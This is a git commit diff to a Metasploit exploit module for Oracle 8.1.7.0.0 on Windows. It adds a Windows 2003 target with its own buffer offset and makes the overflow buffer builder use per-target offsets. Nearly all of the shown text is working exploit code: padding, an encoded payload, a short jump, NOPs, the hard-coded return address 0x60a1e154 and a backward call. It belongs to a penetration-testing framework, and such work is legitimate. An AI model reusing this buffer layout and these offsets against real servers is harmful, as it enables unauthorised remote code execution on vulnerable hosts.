added support for 2k3.
git-svn-id: file:///home/svn/framework3/trunk@6092 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
51f01d05a4
commit
ddafdad942
|
@ -41,7 +41,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)', { 'Ret' => 0x60a1e154 } ],
|
||||
[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)', { 'Offset' => 6383, 'Ret' => 0x60a1e154 } ],
|
||||
[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)', { 'Offset' => 6379, 'Ret' => 0x60a1e154 }] ,
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Jun 28 2001'))
|
||||
|
@ -74,7 +75,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def exploit
|
||||
connect
|
||||
|
||||
buff = rand_text_alpha_upper(6383 - payload.encoded.length) + payload.encoded
|
||||
buff = rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded
|
||||
buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
|
||||
buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(966)
|
||||
|
||||
|
|
Loading…
Reference in New Issue